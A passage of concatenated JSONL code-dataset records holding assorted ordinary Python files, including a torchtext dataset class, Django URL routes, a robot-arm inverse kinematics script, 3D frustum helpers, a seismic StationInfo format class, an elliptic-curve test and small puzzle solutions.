min(len(country_capital), ROW_COUNT))\n for i in range(min(len(country_capital), ROW_COUNT)):\n row = \"\"\n\n el = country_capital.pop()\n row += (el[0].replace(\" \", \"_\")[:10] + \" \" + uint32_t() + \" \" +\n el[1].replace(\" \", \"_\")[:10] + \" \" +\n str(random.choice(MAINLAND)))\n\n ch = random.choice(TOURISM)\n row += \" \" + str(ch) + \" \"\n\n if 0 == ch:\n row += (uint32_t() +\" \"+\n str(random.choice(EXCURSION)))\n elif 1 == ch:\n row += (str(random.choice(SEASON)) +\" \"+\n int32_t() +\" \"+\n int32_t() +\" \"+\n uint32_t())\n elif 2 == ch:\n row += (str(random.choice(SPORT)) + \" \" +\n uint32_t())\n else:\n assert(false)\n data.append(row)\n\n with open(FILENAME, \"w\") as f:\n for i in range(len(data)):\n f.write(data[i] + \"\\n\")\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"lab_02/gen_file.py","file_name":"gen_file.py","file_ext":"py","file_size_in_byte":2482,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"15829184","text":"import torch\n\nimport itertools\nimport math\nimport os\n\nfrom .. import data\n\n\nclass LanguageModelingDataset(data.Dataset):\n\n def __init__(self, path, fields, newline_eos=True, **kwargs):\n\n if not isinstance(fields, (tuple, list)):\n fields = [('text', fields)]\n\n field = fields[0][1]\n\n path = os.path.expanduser(path)\n\n text = []\n with open(path) as f:\n for line in f:\n text += field.preprocess(line)\n if newline_eos:\n text.append('')\n\n examples = [data.Example.fromlist([text], fields)]\n\n # chunks = itertools.zip_longest(*[iter(text)] * field.fix_length,\n # fillvalue='')\n # target_chunks = itertools.zip_longest(\n # *[iter(text[1:] + [''])] * field.fix_length, fillvalue='')\n\n # examples = [data.Example.fromlist([chunk, target_chunk], fields)\n # for chunk, target_chunk in zip(chunks, target_chunks)]\n\n super().__init__(examples, fields, **kwargs)\n\n\nclass WikiText2(LanguageModelingDataset, data.ZipDataset):\n\n url = 'https://s3.amazonaws.com/research.metamind.io/wikitext/wikitext-2-v1.zip'\n filename = 'wikitext-2-v1.zip'\n dirname = 'wikitext-2'\n\n @classmethod\n def splits(cls, field, root='.', train='train.tokens', dev='valid.tokens',\n test='test.tokens'):\n path = cls.download_or_unzip(root)\n return super().splits(os.path.join(path, 'wiki.'), train, dev, test,\n fields=field)\n\n @classmethod\n def iters(cls, batch_size=32, bptt_len=35, device=0, root='.',\n wv_path=None, **kwargs):\n TEXT = data.Field(time_series=True)\n\n train, dev, test = cls.splits(TEXT, root=root, **kwargs)\n\n TEXT.build_vocab(train, wv_path=wv_path)\n\n return data.BPTTIterator.splits(\n (train, dev, test), batch_size=batch_size, bptt_len=bptt_len,\n device=device)\n","sub_path":"torchtext/datasets/language_modeling.py","file_name":"language_modeling.py","file_ext":"py","file_size_in_byte":2014,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"395414573","text":"from django.urls import path\nfrom users import views\n\nurlpatterns = [\n path('check/id//', views.IsExistId),\n path('check/email//', views.IsExistEmail),\n path('user/create/', views.UserCreateAPI.as_view()),\n path('user/create/verify/', views.UserCreateVerify),\n path('user/info/', views.AuthInfoGetView.as_view()),\n path('user/update/', views.AuthInfoUpdateview.as_view()),\n path('user/follows/', views.UserFollowsGetView.as_view()),\n path('isFollow///', views.IsFollow),\n path('user/pub_data//', views.PublicUserDataView.as_view()),\n 
path('follow/delete//', views.FollowRelationDeleteView.as_view()),\n path('follow/create/', views.FollowRelationCreateView.as_view()),\n path('profile/update/', views.ProfileUpdateView.as_view()),\n path('profile/read/', views.ProfileReadView.as_view()),\n]\n","sub_path":"users/urls/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"403777716","text":"from dxl2 import Motor, Connection, Instruction, MotorType\nfrom math import sqrt, acos, pi\nfrom time import sleep\n\nimport math\n\n\nconn = Connection(\"/dev/tty.usbserial-A5052MJ8\")\nconn.open_port()\n\nm_upper = Motor(conn, 5, MotorType.AX)\nm_lower = Motor(conn, 4, MotorType.AX)\nm_pencil = Motor(conn, 6, MotorType.AX)\n\nm_upper.write(Instruction.MOVING_SPEED, 100)\nm_lower.write(Instruction.MOVING_SPEED, 100)\n\nm_upper.write(Instruction.TORQUE_ENABLE, 1)\nm_lower.write(Instruction.TORQUE_ENABLE, 1)\n\nPENCIL_UP = 608\nPENCIL_DOWN = 502\n\n\ndef to_degree(x):\n return x * 180 / pi\n\ndef map(x, in_min, in_max, out_min, out_max):\n ret = (x - in_min) * (out_max - out_min) / (in_max - in_min) + out_min\n return int(ret)\n\ndef move_to(\n x, y\n): # (x, y) are coords to move to. z is positon of arm either to be up or down. a is for the stationary motor. b is for gripper angle initially.\n # lengths\n l1 = 10 # shoulder to elbow\n l2 = 14 # elbow to wrist\n r = sqrt(x ** 2 + y ** 2)\n\n if r > (l1 + l2):\n print(\"math error: \", r, l1 + l2)\n return\n\n theta_2 = pi - acos((l1 ** 2 + l2 ** 2 - r ** 2) / (2 * l1 * l2))\n theta_1 = acos(x / r) - acos((l1 ** 2 + r ** 2 - l2 ** 2) / (2 * l1 * r))\n\n theta_1 = theta_1 - pi / 2\n\n theta_1 = to_degree(theta_1)\n theta_2 = to_degree(theta_2)\n\n print(f\"theta_1: {theta_1}\")\n print(f\"theta_2: {theta_2}\")\n\n theta_2 = map(theta_2, -150, +150, 0, 1023)\n theta_1 = map(theta_1, -150, +150, 0, 1023)\n\n m_upper.write(Instruction.GOAL_POSITION, theta_2)\n m_lower.write(Instruction.GOAL_POSITION, theta_1)\n\n# for x_start in rage()\n# move_to(0, 17)\n\n\ndef y(x):\n return x ** 2 + 12\n\n# print(m_pencil.write(Instruction.GOAL_POSITION, PENCIL_UP))\n# print(m_lower.write(Instruction.GOAL_POSITION, 800))\n# move_to(0, 24)\n# sleep(2)\n\nx_start = -2\n\n# m_pencil.write(Instruction.GOAL_POSITION, PENCIL_DOWN)\nwhile x_start <= +10:\n move_to(x_start, y(x_start))\n x_start += 0.05\n sleep(1)\n","sub_path":"arm.py","file_name":"arm.py","file_ext":"py","file_size_in_byte":1975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"361252763","text":"#!/usr/bin/python\n\n## @file\n# Contains helper methods for various tasks.\n\n# import avango-guacamole libraries\nimport avango\nimport avango.gua\nimport avango.script\n\n# import framework libraries\nfrom SceneManager import SceneManager\n\n# import python libraries\nimport math\n\n## Converts a rotation matrix to the Euler angles yaw, pitch and roll.\n# @param MATRIX The rotation matrix to be converted.\ndef get_euler_angles(MATRIX):\n\n quat = MATRIX.get_rotate()\n qx = quat.x\n qy = quat.y\n qz = quat.z\n qw = quat.w\n\n sqx = qx * qx\n sqy = qy * qy\n sqz = qz * qz\n sqw = qw * qw\n \n unit = sqx + sqy + sqz + sqw # if normalised is one, otherwise is correction factor\n test = (qx * qy) + (qz * qw)\n\n if test > 1:\n yaw = 0.0\n roll = 0.0\n pitch = 0.0\n\n if test > (0.49999 * unit): # singularity at north pole\n yaw = 2.0 * math.atan2(qx,qw)\n roll = math.pi/2.0\n pitch = 
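move_to in the arm record above solves two-link inverse kinematics by the law of cosines; at full extension straight up, both joint angles should vanish (same l1=10, l2=14 link lengths as in the record):

from math import sqrt, acos, pi

l1, l2 = 10.0, 14.0
x, y = 0.0, l1 + l2                      # wrist at maximum reach, straight up
r = sqrt(x ** 2 + y ** 2)
theta_2 = pi - acos((l1 ** 2 + l2 ** 2 - r ** 2) / (2 * l1 * l2))
theta_1 = acos(x / r) - acos((l1 ** 2 + r ** 2 - l2 ** 2) / (2 * l1 * r)) - pi / 2
# elbow fully straight, shoulder pointing along +y with no offset
assert abs(theta_1) < 1e-9 and abs(theta_2) < 1e-9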
0.0\n elif test < (-0.49999 * unit): # singularity at south pole\n yaw = -2.0 * math.atan2(qx,qw)\n roll = math.pi/-2.0\n pitch = 0.0\n else:\n yaw = math.atan2(2.0 * qy * qw - 2.0 * qx * qz, 1.0 - 2.0 * sqy - 2.0 * sqz)\n roll = math.asin(2.0 * test)\n pitch = math.atan2(2.0 * qx * qw - 2.0 * qy * qz, 1.0 - 2.0 * sqx - 2.0 * sqz)\n\n if yaw < 0.0:\n yaw += 2.0 * math.pi\n\n if pitch < 0:\n pitch += 2 * math.pi\n \n if roll < 0:\n roll += 2 * math.pi\n\n return yaw, pitch, roll\n\n\n## Extracts the yaw (head) rotation from a rotation matrix.\n# @param MATRIX The rotation matrix to extract the angle from.\ndef get_yaw(MATRIX):\n\n try:\n _yaw, _, _ = get_euler_angles(MATRIX)\n return _yaw\n except:\n return 0\n\n\n## Returns the rotation matrix of the rotation between two input vectors.\n# @param VEC1 First vector.\n# @param VEC2 Second vector.\ndef get_rotation_between_vectors(VEC1, VEC2):\n\n VEC1.normalize()\n VEC2.normalize() \n\n _angle = math.degrees(math.acos(VEC1.dot(VEC2)))\n _axis = VEC1.cross(VEC2)\n\n return avango.gua.make_rot_mat(_angle, _axis)\n\n## Returns the Euclidean distance between two points.\n# @param POINT1 Starting point.\n# @param POINT2 End point.\ndef euclidean_distance(POINT1, POINT2):\n _diff_x = POINT2.x - POINT1.x\n _diff_y = POINT2.y - POINT1.y\n _diff_z = POINT2.z - POINT1.z\n\n return math.sqrt(math.pow(_diff_x, 2) + math.pow(_diff_y, 2) + math.pow(_diff_z, 2))\n\n## Computes the distance between a Point and a 3D-line.\n# @param POINT_TO_CHECK The point to compute the distance for.\n# @param LINE_POINT_1 One point lying on the line.\n# @param LINE_VEC Direction vector of the line.\ndef compute_point_to_line_distance(POINT_TO_CHECK, LINE_POINT_1, LINE_VEC):\n\n _point_line_vec = avango.gua.Vec3(LINE_POINT_1.x - POINT_TO_CHECK.x, LINE_POINT_1.y - POINT_TO_CHECK.y, LINE_POINT_1.z - POINT_TO_CHECK.z)\n\n _dist = (_point_line_vec.cross(LINE_VEC)).length() / LINE_VEC.length()\n\n return _dist\n\ndef compute_plane(POINT1, POINT2, POINT3):\n\n _v1 = POINT1 - POINT3\n _v2 = POINT2 - POINT3\n _v1.normalize()\n _v2.normalize()\n \n _n = _v1.cross(_v2)\n _n.normalize()\n \n _d = - _n.dot(POINT1)\n return (_n, _d)\n\ndef compute_point_plane_distance(N, D, POINT):\n\n # compute point plane distance: <0.0 --> in front of plane: >0.0 behind plane\n return N.x * POINT.x + N.y * POINT.y + N.z * POINT.z + D\n\n\n## Checks if a point is inside the viewing frustum of a user.\n# @param POINT The point to be checked.\n# @param USER_REPRESENTATION The UserRepresentation instance to which SCREEN is belonging to.\n# @param SCREEN The screen to create the viewing frustum for. 
\ndef is_inside_frustum(POINT, USER_REPRESENTATION, SCREEN):\n\n  _user_head_world_pos = USER_REPRESENTATION.head.WorldTransform.value.get_translate()\n  _screen_world_mat = SCREEN.WorldTransform.value\n\n  # if user representation is in virtual display, start intersecting from the virtual display plane\n  if USER_REPRESENTATION.is_in_virtual_display():\n    _head_in_screen_pos = avango.gua.make_inverse_mat(_screen_world_mat) * _user_head_world_pos\n    _near_clip = abs(_head_in_screen_pos.z)\n  else:\n    _near_clip = SceneManager.current_near_clip\n\n  _far_clip = SceneManager.current_far_clip\n\n\n  # head space (but with nav orientation)\n  _head_mat = SCREEN.WorldTransform.value\n  _head_mat.set_translate(_user_head_world_pos)\n \n  _point = avango.gua.make_inverse_mat(_head_mat) * POINT # point in head space\n  _depth = abs(_point.z)\n  if (_depth < _near_clip) or (_depth > _far_clip): # point in front of near plane or behind far plane --> outside frustum\n    return False\n\n \n  # compute screen corner points\n  _screen_width = SCREEN.Width.value\n  _screen_height = SCREEN.Height.value\n \n  _tl_world_pos = _screen_world_mat * avango.gua.Vec3(-_screen_width * 0.5, _screen_height * 0.5, 0.0)\n  _tr_world_pos = _screen_world_mat * avango.gua.Vec3(_screen_width * 0.5, _screen_height * 0.5, 0.0)\n  _bl_world_pos = _screen_world_mat * avango.gua.Vec3(-_screen_width * 0.5, -_screen_height * 0.5, 0.0)\n  _br_world_pos = _screen_world_mat * avango.gua.Vec3(_screen_width * 0.5, -_screen_height * 0.5, 0.0)\n\n  _tl_world_pos = avango.gua.Vec3(_tl_world_pos.x, _tl_world_pos.y, _tl_world_pos.z)\n  _tr_world_pos = avango.gua.Vec3(_tr_world_pos.x, _tr_world_pos.y, _tr_world_pos.z) \n  _bl_world_pos = avango.gua.Vec3(_bl_world_pos.x, _bl_world_pos.y, _bl_world_pos.z)\n  _br_world_pos = avango.gua.Vec3(_br_world_pos.x, _br_world_pos.y, _br_world_pos.z)\n \n  ## compute lateral planes ##\n  _left_plane = compute_plane(_bl_world_pos, _tl_world_pos, _user_head_world_pos)\n  _distance = compute_point_plane_distance(_left_plane[0], _left_plane[1], POINT)\n  if _distance < 0.0: # point in front of left plane --> outside frustum\n    return False\n\n  _right_plane = compute_plane(_tr_world_pos, _br_world_pos, _user_head_world_pos)\n  _distance = compute_point_plane_distance(_right_plane[0], _right_plane[1], POINT)\n  if _distance < 0.0: # point in front of right plane --> outside frustum\n    return False\n\n  _top_plane = compute_plane(_tl_world_pos, _tr_world_pos, _user_head_world_pos)\n  _distance = compute_point_plane_distance(_top_plane[0], _top_plane[1], POINT)\n  if _distance < 0.0: # point in front of top plane --> outside frustum\n    return False\n\n  _bottom_plane = compute_plane(_br_world_pos, _bl_world_pos, _user_head_world_pos)\n  _distance = compute_point_plane_distance(_bottom_plane[0], _bottom_plane[1], POINT)\n  if _distance < 0.0: # point in front of bottom plane --> outside frustum\n    return False\n\n  return True \n \n\n","sub_path":"lib-server/Utilities.py","file_name":"Utilities.py","file_ext":"py","file_size_in_byte":6442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"340055535","text":"import os\r\nimport pandas as pd\r\n\r\nfilepath = 'C:/Users/jyoo/Desktop/'\r\ndf = pd.read_csv('C:/Users/jyoo/Desktop/BM.csv',header = 0)\r\n\r\nprint(list(df.columns.values))\r\n\r\n#print(df.iloc[1,1])\r\n\r\n#print(testcase.zfill(10))\r\n\r\nfor i in range(0,len(df.index)):\r\n    if not os.path.exists(filepath + str(df.iloc[i,0]).zfill(4) + '/' ):\r\n        os.mkdir(filepath + 
str(df.iloc[i,0]).zfill(4) + '/' )\r\n\r\n#if not os.path.exists(filepath + foldername):\r\n#    os.mkdir(filepath + foldername)\r\n#print(type(folders))\r\n\r\nprint(\"All Done\")\r\n","sub_path":"_Python - Create Multiple Folders.py","file_name":"_Python - Create Multiple Folders.py","file_ext":"py","file_size_in_byte":530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"469799408","text":"from django import template\n\nfrom services.xml.problem import Problem\n\nfrom datetime import date as Date\nfrom typing import List, Optional\n\nregister = template.Library()\n\n\ndef format_date(date: Optional[Date]) -> str:\n    if date is None:\n        return ''\n    return date.strftime(\"%d %b %Y\")\n\ndef end_date(problem: Problem) -> str:\n    parsed_end_date = problem.parsed_end_date()\n    if parsed_end_date is None:\n        return \"(ended: N/A)\"\n    return \"(ended: {})\".format(format_date(problem.parsed_end_date()))\n\n\ndef diagnosed_date(problem: Problem, problem_list: List[Problem]) -> str:\n    dates = []\n    for item in problem_list:\n        dates.append(item.parsed_date())\n\n    dates += [problem.parsed_date()]\n    date = min(dates)\n    if date:\n        return \"(diagnosed: {})\".format(format_date(date))\n    else:\n        return ''\n\n\ndef additional_medication_dates_description(record):\n    dates = []\n    if record.prescribed_from:\n        text = \"from: {}\".format(format_date(record.prescribed_from))\n        dates += [text]\n    if record.prescribed_to:\n        text = \"to: {}\".format(format_date(record.prescribed_to))\n        dates += [text]\n\n    if any(dates):\n        return \"({})\".format(' '.join(dates))\n    else:\n        return ''\n\n\ndef linked_problems(problem, problem_list):\n    filtered_list = filter(lambda x: problem.guid() in x.target_guids(), problem_list)\n    return list(filtered_list)\n\n\ndef problem_xpaths(problem, problem_link_list):\n    problem_link_xpaths = []\n    for link in linked_problems(problem, problem_link_list):\n        problem_link_xpaths += link.xpaths()\n\n    xpaths = problem.xpaths() + problem_link_xpaths\n    return list(set(xpaths))\n","sub_path":"medicalreport/templatetags/helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":1675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"353304380","text":"# rebinding a name does not change the object another name refers to.\na = 0\nb = a\nb = 2\nprint (a, b)\n\n\n# rebinding a parameter inside a function does not swap the caller's variables.\ndef exchange(first, second):\n    tmp = first\n    first = second\n    second = tmp\n\ni = 8\nj = 9\nexchange(i, j)\nprint (i, j)\nexit()\n\n\n\n","sub_path":"gramma/language/ValueOrAddress.py","file_name":"ValueOrAddress.py","file_ext":"py","file_size_in_byte":243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"237816878","text":"#!/usr/bin/env python\n\n# package imports\nimport detectionformats.site\nimport detectionformats.source\n\n# stdlib imports\nimport json\n\n\nclass StationInfo:\n    \"\"\"StationInfo - a conversion class used to create, parse, and validate\n    station info data as part of detection data.\n    \"\"\"\n\n    # json keys\n    TYPE_KEY = \"Type\"\n    SITE_KEY = \"Site\"\n    QUALITY_KEY = \"Quality\"\n    ENABLE_KEY = \"Enable\"\n    USEFORTELESEISMIC_KEY = \"UseForTeleseismic\"\n    INFORMATIONREQUESTOR_KEY = \"InformationRequestor\"\n\n    def __init__(\n        self,\n        newSite=None,\n        newQuality=None,\n        newEnable=None,\n        newUseForTeleseismic=None,\n        newInformationRequestor=None,\n    ):\n        \"\"\"Initialize the station info object. 
Constructs an empty object\n        if all arguments are None\n\n        Args:\n            newSite: a required detectionformats.site.Site containing the desired\n                site\n            newQuality: an optional Number containing the station quality\n            newEnable: an optional Boolean indicating whether the station should\n                be used or not\n            newUseForTeleseismic: an optional Boolean indicating whether the\n                station should be used for teleseismic calculations or not\n            newInformationRequestor: an optional detectionformats.source.Source\n                containing the source of the information\n        Returns:\n            Nothing\n        Raises:\n            Nothing\n        \"\"\"\n        # first required keys\n        self.type = \"StationInfo\"\n        if newSite is not None:\n            self.site = newSite\n        else:\n            self.site = detectionformats.site.Site()\n\n        # second optional keys\n        if newQuality is not None:\n            self.quality = newQuality\n\n        if newEnable is not None:\n            self.enable = newEnable\n\n        if newUseForTeleseismic is not None:\n            self.useForTeleseismic = newUseForTeleseismic\n\n        if newInformationRequestor is not None:\n            self.informationRequestor = newInformationRequestor\n        else:\n            self.informationRequestor = detectionformats.source.Source()\n\n    def fromJSONString(self, jsonString):\n        \"\"\"Populates the object from a json formatted string\n\n        Args:\n            jsonString: a required String containing the json formatted text\n        Returns:\n            Nothing\n        Raises:\n            Nothing\n        \"\"\"\n        jsonObject = json.loads(jsonString)\n        self.fromDict(jsonObject)\n\n    def fromDict(self, aDict):\n        \"\"\"Populates the object from a dictionary\n\n        Args:\n            aDict: a required dictionary\n        Returns:\n            Nothing\n        Raises:\n            Nothing\n        \"\"\"\n        # first required keys\n        try:\n            self.type = aDict[self.TYPE_KEY]\n            self.site.fromDict(aDict[self.SITE_KEY])\n        except (ValueError, KeyError, TypeError) as e:\n            print(\"Dict format error, missing required keys: %s\" % e)\n\n        # second optional keys\n        if self.QUALITY_KEY in aDict:\n            self.quality = aDict[self.QUALITY_KEY]\n\n        if self.ENABLE_KEY in aDict:\n            self.enable = aDict[self.ENABLE_KEY]\n\n        if self.USEFORTELESEISMIC_KEY in aDict:\n            self.useForTeleseismic = aDict[self.USEFORTELESEISMIC_KEY]\n\n        if self.INFORMATIONREQUESTOR_KEY in aDict:\n            self.informationRequestor.fromDict(aDict[self.INFORMATIONREQUESTOR_KEY])\n\n    def toJSONString(self):\n        \"\"\"Converts the object to a json formatted string\n\n        Args:\n            None\n        Returns:\n            The JSON formatted message as a String\n        Raises:\n            Nothing\n        \"\"\"\n        jsonObject = self.toDict()\n\n        return json.dumps(jsonObject, ensure_ascii=False)\n\n    def toDict(self):\n        \"\"\"Converts the object to a dictionary\n\n        Args:\n            None\n        Returns:\n            The dictionary\n        Raises:\n            Nothing\n        \"\"\"\n        aDict = {}\n\n        # first required keys\n        try:\n            aDict[self.TYPE_KEY] = self.type\n            aDict[self.SITE_KEY] = self.site.toDict()\n        except (NameError, AttributeError) as e:\n            print(\"Missing required data error: %s\" % e)\n\n        # second optional keys\n        if hasattr(self, \"quality\"):\n            aDict[self.QUALITY_KEY] = self.quality\n\n        if hasattr(self, \"enable\"):\n            aDict[self.ENABLE_KEY] = self.enable\n\n        if hasattr(self, \"useForTeleseismic\"):\n            aDict[self.USEFORTELESEISMIC_KEY] = self.useForTeleseismic\n\n        if hasattr(self, \"informationRequestor\"):\n            aDict[self.INFORMATIONREQUESTOR_KEY] = self.informationRequestor.toDict()\n\n        return aDict\n\n    def isValid(self):\n        \"\"\"Checks to see if the object is 
valid\n\n Args:\n None\n Returns:\n True if the object is valid, False otherwise\n Raises:\n Nothing\n \"\"\"\n errorList = self.getErrors()\n\n return not errorList\n\n def getErrors(self):\n \"\"\"Gets a list of object validation errors\n\n Args:\n None\n Returns:\n A List of Strings containing the validation error messages\n Raises:\n Nothing\n \"\"\"\n errorList = []\n\n # first required keys\n try:\n if self.type == \"\":\n errorList.append(\"Empty Type in StationInfo Class.\")\n elif self.type != \"StationInfo\":\n errorList.append(\"Non-StationInfo Type in StationInfo Class.\")\n except (NameError, AttributeError):\n errorList.append(\"No Type in StationInfo Class.\")\n\n try:\n if not self.site.isValid():\n errorList.append(\"Invalid Site in StationInfo Class.\")\n except (NameError, AttributeError):\n errorList.append(\"No Site in StationInfo Class.\")\n\n try:\n if self.site.latitude < -90 or self.site.latitude > 90:\n errorList.append(\n \"Latitude in StationInfo Class not in the range of -90 to 90.\"\n )\n except (NameError, AttributeError):\n errorList.append(\"No Latitude in StationInfo Class.\")\n\n try:\n if self.site.longitude < -180 or self.site.longitude > 180:\n errorList.append(\n \"Longitude in StationInfo Class not in the range of -180 to 180.\"\n )\n except (NameError, AttributeError):\n errorList.append(\"No Longitude in StationInfo Class.\")\n\n try:\n if self.site.elevation < -550 or self.site.elevation > 8900:\n errorList.append(\n \"Elevation in StationInfo Class not in the range of -550 to 8900.\"\n )\n except (NameError, AttributeError):\n errorList.append(\"No Elevation in StationInfo Class.\")\n\n # second optional keys\n if hasattr(self, \"informationRequestor\"):\n if not self.informationRequestor.isValid():\n errorList.append(\"Invalid InformationRequestor in StationInfo Class.\")\n\n return errorList\n","sub_path":"python/detectionformats/stationinfo.py","file_name":"stationinfo.py","file_ext":"py","file_size_in_byte":7439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"580156394","text":"from unittest import TestCase\nfrom crypto.fieldelement import FieldElement\nfrom crypto.point import Point\n\n\nclass EecTest(TestCase):\n def test_field_elements_on_curve(self):\n prime = 223\n a = FieldElement(0, prime)\n b = FieldElement(7, prime)\n valid_points = ((192, 105), (17, 56), (1, 193))\n invalid_points = ((200, 119), (42, 99))\n for x_raw, y_raw in valid_points:\n x = FieldElement(x_raw, prime)\n y = FieldElement(y_raw, prime)\n Point(x, y, a, b)\n for x_raw, y_raw in invalid_points:\n x = FieldElement(x_raw, prime)\n y = FieldElement(y_raw, prime)\n with self.assertRaises(ValueError):\n Point(x, y, a, b)\n\n def test_add_for_field_points(self):\n prime = 223\n a = FieldElement(0, prime)\n b = FieldElement(7, prime)\n p1 = Point(FieldElement(170, prime), FieldElement(142, prime), a, b)\n p2 = Point(FieldElement(60, prime), FieldElement(139, prime), a, b)\n p_result = Point(FieldElement(220, prime), FieldElement(181, prime), a, b)\n self.assertTrue(p1 + p2 == p_result)\n p1 = Point(FieldElement(47, prime), FieldElement(71, prime), a, b)\n p2 = Point(FieldElement(17, prime), FieldElement(56, prime), a, b)\n p_result = Point(FieldElement(215, prime), FieldElement(68, prime), a, b)\n self.assertTrue(p1 + p2 == p_result)\n p1 = Point(FieldElement(143, prime), FieldElement(98, prime), a, b)\n p2 = Point(FieldElement(76, prime), FieldElement(66, prime), a, b)\n p_result = Point(FieldElement(47, prime), 
FieldElement(71, prime), a, b)\n        self.assertTrue(p1 + p2 == p_result)\n\n","sub_path":"tests/crypto/eectest.py","file_name":"eectest.py","file_ext":"py","file_size_in_byte":1709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"98215222","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Jul  9 18:50:21 2021\r\n\r\n@author: andya\r\n\"\"\"\r\nN = 15\r\ndef get_prime_divisor(N):\r\n    prime_list = []\r\n    for i in range(2, N + 1):\r\n        # all prime numbers are greater than 1\r\n        if i > 1 and N%i == 0:\r\n            for j in range(2, i):\r\n                if (i % j) == 0:\r\n                    break\r\n            else:\r\n                prime_list.append(i)\r\n    return prime_list\r\n\r\ndef solution(A, B):\r\n    \r\n    answer = 0\r\n    for i in range(len(A)):\r\n        A_list = get_prime_divisor(A[i])\r\n        B_list = get_prime_divisor(B[i])\r\n        \r\n        if A_list == B_list:\r\n            answer += 1\r\n    return answer\r\n\r\n# sample inputs so the script can run standalone (assumed example values)\r\nA = [15, 10, 3]\r\nB = [75, 30, 5]\r\nprint(solution(A, B))","sub_path":"12_2_CommonPrimeDivisors.py","file_name":"12_2_CommonPrimeDivisors.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"503421401","text":"def prepare_report_request(facebook, report):\n    result = dict()\n    result[\"level\"] = report[\"level\"]\n    fields = report[\"fields\"].copy()\n    if report.get(\"filtering\"):\n        result[\"filtering\"] = report.get(\"filtering\")\n    if report.get(\"action_attribution_windows\"):\n        result[\"action_attribution_windows\"] = report.get(\"action_attribution_windows\")\n    if report.get(\"action_report_time\"):\n        result[\"action_report_time\"] = report.get(\"action_report_time\")\n    if 'account_id' not in fields:\n        fields.append('account_id')\n    if \"purchase\" in fields:\n        fields[fields.index(\"purchase\")] = \"actions\"\n    elif \"total_actions\" in fields:\n        fields[fields.index(\"total_actions\")] = \"actions\"\n    if \"video_view_10_sec\" in fields:\n        fields[fields.index(\"video_view_10_sec\")] = \"video_10_sec_watched_actions\"\n    if \"updated_time\" not in fields:\n        fields.append(\"updated_time\")\n    fields = \", \".join(fields)\n    result[\"fields\"] = fields\n    if report.get(\"breakdowns\"):\n        breakdowns = [b for b in report[\"breakdowns\"]]\n        breakdowns = \", \".join(breakdowns)\n    else:\n        breakdowns = None\n    result[\"breakdowns\"] = breakdowns\n    if report.get('ad_accounts'):\n        accounts = report.get('ad_accounts')\n        query = \"SELECT DISTINCT id, app_system_user_id, account_id FROM %s.ad_accounts WHERE id in ('%s')\"\n        query = query % (facebook.config[\"schema_name\"], \"','\".join(accounts))\n    else:\n        query = \"SELECT DISTINCT id, app_system_user_id, account_id FROM %s.ad_accounts\"\n        query = query % facebook.config[\"schema_name\"]\n    accounts = facebook.dbstream.execute_query(query=query)\n    result[\"accounts\"] = accounts\n    return result\n","sub_path":"pyfbook/core/marketing/extract/params.py","file_name":"params.py","file_ext":"py","file_size_in_byte":1718,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"588087689","text":"import unittest\n\nfrom app.main import db\nimport json\nfrom app.test.base import BaseTestCase\n\nclass TestSpacyBlueprint(BaseTestCase):\n    maxDiff = None\n\n    def test_spacy(self):\n        with self.client:\n            response = self.client.post(\n                '/spacy/',\n                data=json.dumps(dict(\n                    text='Pastafarians are smarter than people with Coca Cola bottles.',\n                    model='en'\n                )),\n                content_type='application/json'\n            )\n            self.assertEqual('application/json', response.content_type)\n            self.assertEqual(200, 
response.status_code)\n data = json.loads(response.data.decode())\n self.assertDictEqual(json.load(open('./app/test/data/spacy.json')), data)\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"app/test/test_spacy.py","file_name":"test_spacy.py","file_ext":"py","file_size_in_byte":830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"172691368","text":"#!/usr/bin/env python3\nfrom sys import stdin\n\nn = int(stdin.readline())\n\ndef column(b, col):\n ret = ''\n for i in b:\n ret += i[col]\n return ret\n\ndef check_array(b):\n # Check rows\n for i in range(4):\n if b[i].count('X') + b[i].count('T') == 4:\n return 'X won'\n if b[i].count('O') + b[i].count('T') == 4:\n return 'O won'\n # Check cols\n for i in range(4):\n if column(b,i).count('X') + column(b,i).count('T') == 4:\n return 'X won'\n if column(b,i).count('O') + column(b,i).count('T') == 4:\n return 'O won'\n # Check diags\n x1 = o1 = x2 = o2 = t1 = t2 = 0\n for i in range(4):\n x1 += int(b[i][i] == 'X')\n x2 += int(b[i][3-i] == 'X')\n o1 += int(b[i][i] == 'O')\n o2 += int(b[i][3-i] == 'O')\n t1 += int(b[i][i] == 'T')\n t2 += int(b[i][3-i] == 'T')\n if x1 + t1 == 4 or x2 + t2 == 4:\n return 'X won'\n if o1 + t1 == 4 or o2 + t2 == 4:\n return 'O won'\n # Count dots\n dots = 0\n for i in b:\n dots += i.count('.')\n if dots != 0:\n return 'Game has not completed'\n else:\n return 'Draw'\n\nfor k in range(1, n+1):\n # Read array\n b = []\n for i in range(4):\n b.append(stdin.readline())\n stdin.readline()\n\n print('Case #', k, ': ', check_array(b), sep='')\n\n","sub_path":"solutions_2453486_1/Python/rasen/a.py","file_name":"a.py","file_ext":"py","file_size_in_byte":1365,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} 